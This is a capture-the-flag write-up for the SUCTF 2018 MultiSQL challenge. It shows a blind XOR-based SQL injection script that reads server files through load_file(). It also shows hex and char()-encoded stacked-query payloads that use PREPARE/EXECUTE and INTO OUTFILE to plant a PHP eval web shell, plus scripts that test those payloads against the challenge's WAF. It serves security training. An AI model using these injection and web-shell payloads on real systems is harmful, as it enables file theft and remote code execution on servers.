SUCTF-2018-MultiSQL

Summary
SQL stacked injection, file read, file write


Entering the challenge, you can log in and register. Fuzzing suggests that quite a lot is filtered, but it is hard to tell exactly what.

After logging in there is a profile page with a suspicious id parameter, plus an image upload that restricts the file extension.

Testing shows a numeric injection at id, and hex is not filtered.

SQL file read

```python
# coding=utf-8
import requests
import time


# The original imports a local helper module "Func" that is not shown on the
# page; its hex_Char() turns a string into a MySQL 0x... literal, as the
# printed payload later in this write-up confirms. Inlined so the script runs.
def hex_char(s):
    return "0x" + s.encode().hex()


flag = ""
url0 = "http://35d51ea9-d1ce-4398-83d3-db931ec5b398.node4.buuoj.cn:81/user/user.php?id={}"
cookie = {"PHPSESSID": "miq9eu5fc7i2qst8qslb0cuj42"}
data = '0x'  # grows into the 0x literal of the hex digits recovered so far

# id=0^(cond): XOR makes id evaluate to 1 (the admin row) when cond is true and
# to 0 otherwise, without touching the blacklisted and/or keywords.
sql1 = "0^(hex(database())>={})"
# database name
sql2 = ""
# table name (left blank in the original)
sql3 = ""
# column name (left blank in the original)
sql4 = ""
# data (left blank in the original)
what_file = hex_char("/var/www/html/index.php")
sql5 = "0^(hex(load_file(" + what_file + "))>={})"
# file read

url = url0.format(sql5)
# choose which query to run

# Each outer iteration recovers one character of hex(...) by binary search over
# ASCII 48..90 ('0'..'Z'); hex() only emits 0-9 and A-F, so 48..70 would do.
for x in range(1, 100):
    left = 48
    right = 90
    while right > left:
        mid = int((left + right + 1) / 2)
        pay = url.format(data + format(mid, "02x"))
        response = requests.get(url=pay, cookies=cookie)
        if "admin" in response.text:  # admin row came back => comparison true
            left = mid
        else:
            right = mid - 1
        time.sleep(0.09)  # throttle, to avoid dirty data
    data += format(right, "02x")
    flag += chr(right)
    print(flag)
print(flag)  # hex(file) as recovered so far
# decode the hex pairs back into the file's bytes (drops a trailing odd digit)
print(bytes.fromhex(flag[: len(flag) // 2 * 2]).decode("utf-8", "replace"))
```

Many functions seem to be filtered, but testing shows load_file() can still read files.

Optimizations: each character of hex(...) is found by binary-search comparison rather than a linear scan, and the comparison range can be narrowed because hex() only emits 0-9 and A-F.
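As an added illustration, not part of the original write-up, the script below simulates the boolean oracle behind 0^(hex(load_file(...))>=0x...) against a constructed sample file, runs the same binary search with the range narrowed to '0'..'F', and stops cleanly when the file is exhausted instead of appending '0' digits forever. The HTTP request and cookie are replaced by an in-process oracle() so it runs offline; SAMPLE_FILE, build_id() and the other helper names are assumptions of this example, not code from the challenge or the author.

```python
# Added example: offline simulation of the blind hex(load_file()) read.
SAMPLE_FILE = b"<?php\ninclude 'waf.php';\n"  # constructed stand-in for the target file


def build_id(path, prefix_literal):
    """The id value actually sent: 0^(cond) yields 1 (the admin row) when cond
    holds and 0 otherwise, without the blacklisted and/or keywords.
    prefix_literal is a MySQL 0x... literal of the hex digits recovered so far
    plus the digit being tested."""
    return "0^(hex(load_file(0x%s))>=%s)" % (path.encode().hex(), prefix_literal)


def oracle(prefix_literal):
    """Stands in for the HTTP request: True when the admin row would come back.
    MySQL compares hex(file) with the 0x literal as strings, so this is a
    prefix-ordered string comparison against the uppercase hex dump."""
    prefix = bytes.fromhex(prefix_literal[2:]).decode()
    return SAMPLE_FILE.hex().upper() >= prefix


def extract_hex(oracle, max_digits=4096, lo=ord("0"), hi=ord("F")):
    """Recover hex(file) digit by digit with binary search: at most 5 queries
    per digit for the 23-value range '0'..'F' (6 for the original '0'..'Z'),
    plus one probe per digit that detects the end of the file."""
    recovered = ""
    queries = 0
    for _ in range(max_digits):
        # If hex(file) is not >= prefix+'0' there is no next digit: stop here
        # instead of appending '0' forever, which the page's loop would do.
        queries += 1
        if not oracle("0x" + (recovered + chr(lo)).encode().hex()):
            break
        left, right = lo, hi
        while right > left:
            mid = (left + right + 1) // 2
            queries += 1
            if oracle("0x" + (recovered + chr(mid)).encode().hex()):
                left = mid          # digit is >= mid
            else:
                right = mid - 1     # digit is < mid
        recovered += chr(right)
    return recovered, queries


def extract_file(oracle):
    """Run the search and turn the recovered hex digits back into bytes."""
    hex_digits, queries = extract_hex(oracle)
    return bytes.fromhex(hex_digits), queries


if __name__ == "__main__":
    content, n = extract_file(oracle)
    print("first request would be id=%s" % build_id("/var/www/html/index.php", "0x30"))
    print("recovered %d bytes in %d queries:" % (len(content), n))
    print(content.decode())
```

Against a live target, oracle() is the only piece that changes: it sends build_id(path, prefix_literal) as the id parameter and returns whether "admin" appears in the response. The end-of-file probe costs one extra query per digit but is what lets the loop terminate on its own.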

SQL file write

On BUU it is hard to keep the read going for long……

Reading index.php shows that it includes bwvs_config/config.php and waf.php.

waf.php

```php
function waf($str){
    $black_str = "/(and|or|union|sleep|select|substr|order|left|right|order|by|where|rand|exp|updatexml|insert|update|dorp|delete|[|]|[&])/i";
    $str = preg_replace($black_str, "@@",$str);
    return addslashes($str);
}
```

The blacklist replaces and/or/select/where and friends with @@ (the misspelt "dorp" means DROP is not actually caught), but it says nothing about hex, load_file, set, prepare, execute, char, into or outfile, and the XOR operator ^ stands in for and/or. What it really takes away is quotes: addslashes() escapes every ' and ", so any string the payload needs must be supplied as a 0x literal or char(...) rather than as a quoted string.

user.php

```php
if(isset($_GET['id'])){
    $id=waf($_GET['id']);
    $sql = "SELECT * FROM dwvs_user_message WHERE DWVS_user_id =".$id;
    $data = mysqli_multi_query($connect,$sql) or die();

    $result = mysqli_store_result($connect);
    $row = mysqli_fetch_row($result);
    echo '<h1>user_id:'.$row[0]."</h1><br><h2>user_name:".$row[1]."</h2><br><h3>注册时间:".$row[4]."</h3>";  // 注册时间 = registration time
}   // rest of the file not shown on the page
```

In PHP, mysqli_multi_query() runs several ;-separated statements in one call, which turns this injection into a stacked-query injection: the first statement still returns the requested row (mysqli_store_result() only reads the first result set), and everything after the ; is executed as well, with no output required.

Since select is blacklisted and any quotes would be escaped by addslashes(), we encode the whole statement as a char()/hex literal, store it in a user variable with SET, and run it through a prepared statement (PREPARE ... FROM @var; EXECUTE ...).

```python
# coding=utf-8
from __future__ import print_function


# The author's Func.hex_Char() helper (not on the page) builds a 0x... literal;
# inlined here so the script runs on its own.
def hex_char(s):
    return "0x" + s.encode().hex()


# stacked query + prepared statement: write a file
set_sql = hex_char("select '<?php eval($_GET[ok]);?>' into outfile '/var/www/html/favicon/a.php';")
sql = "set @xx=" + set_sql + ";prepare x from @xx;execute x;"
print(sql, end="")
```

Output:

set @xx=0x73656c65637420273c3f706870206576616c28245f4745545b6f6b5d293b3f3e2720696e746f206f757466696c6520272f7661722f7777772f68746d6c2f66617669636f6e2f612e706870273b;prepare x from @xx;execute x;
```python
from __future__ import print_function

string = "select '<?php eval($_POST[_]);?>' into outfile '/var/www/html/favicon/shell.php';"

# Emit the statement as a MySQL char(...) literal. The original loop decided
# whether to print a comma by comparing each character with the final ';', so
# the earlier ';' after eval(...) lost its separator and the output read
# "...41,5963,62..."; joining the code points fixes that.
print("char(" + ",".join(str(ord(c)) for c in string) + ")")
```

Output:

char(115,101,108,101,99,116,32,39,60,63,112,104,112,32,101,118,97,108,40,36,95,80,79,83,84,91,95,93,41,59,63,62,39,32,105,110,116,111,32,111,117,116,102,105,108,101,32,39,47,118,97,114,47,119,119,119,47,104,116,109,108,47,102,97,118,105,99,111,110,47,115,104,101,108,108,46,112,104,112,39,59)

http://35d51ea9-d1ce-4398-83d3-db931ec5b398.node4.buuoj.cn:81/user/user.php?id=2;+payload

i.e. id=2;set @xx=...;prepare x from @xx;execute x; with the payload printed above in place of "...". INTO OUTFILE only works if the MySQL account has the FILE privilege, secure_file_priv does not rule out the target directory, and the directory is writable by the MySQL server process and served by the web server.
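Added example, not from the original post or the challenge: a Python port of the waf() shown above, used to check which forms of the file-write payload reach MySQL untouched. The bare statement loses its select to @@ and its quotes to addslashes(), while both the 0x form and the char() form built by the scripts above pass through byte for byte. The port of addslashes(), the payload builder and the helper names are assumptions of this example.

```python
import re

# Python port of the challenge's waf(): blacklist -> "@@", then addslashes().
BLACKLIST = re.compile(
    r"(and|or|union|sleep|select|substr|order|left|right|order|by|where|rand|exp"
    r"|updatexml|insert|update|dorp|delete|[|]|[&])",
    re.IGNORECASE,
)


def php_addslashes(s):
    # PHP addslashes() escapes single quote, double quote, backslash and NUL.
    return (s.replace("\\", "\\\\").replace("'", "\\'")
             .replace('"', '\\"').replace("\0", "\\0"))


def waf(s):
    return php_addslashes(BLACKLIST.sub("@@", s))


def hex_literal(stmt):
    """MySQL 0x... literal, the form the author's Func.hex_Char() produced."""
    return "0x" + stmt.encode().hex()


def char_literal(stmt):
    """MySQL char(...) literal. Joining every code point fixes the page's loop,
    which dropped the comma after any character equal to the final one."""
    return "char(" + ",".join(str(ord(c)) for c in stmt) + ")"


def stacked_prepare_payload(stmt, encoder=hex_literal, base_id="2"):
    """Value of the id parameter: a valid id, then the SET/PREPARE/EXECUTE
    statements that mysqli_multi_query() runs as stacked queries. Hex digits
    and decimal code points never spell a blacklisted word and carry no quotes."""
    return "%s;set @xx=%s;prepare x from @xx;execute x;" % (base_id, encoder(stmt))


def survives_waf(payload):
    """True when the WAF hands the payload to the query unchanged."""
    return waf(payload) == payload


SHELL_STMT = "select '<?php eval($_POST[_]);?>' into outfile '/var/www/html/favicon/shell.php';"

if __name__ == "__main__":
    naive = "2;" + SHELL_STMT
    print("bare statement after waf:", waf(naive))   # select -> @@, quotes escaped
    for enc in (hex_literal, char_literal):
        p = stacked_prepare_payload(SHELL_STMT, enc)
        print(enc.__name__, "survives:", survives_waf(p))
```

survives_waf() is the check to run before each request: if the port of the filter mangles the payload, the real one will too, and the stacked SET/PREPARE/EXECUTE will either fail to parse or write something other than what was intended.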

Then find the flag through shell.php.

It keeps failing to connect……

Reference:
[SUCTF 2018]MultiSQL (SQL file read + file write)

Author

inanb

Published

2021-09-21

Updated

2021-09-21
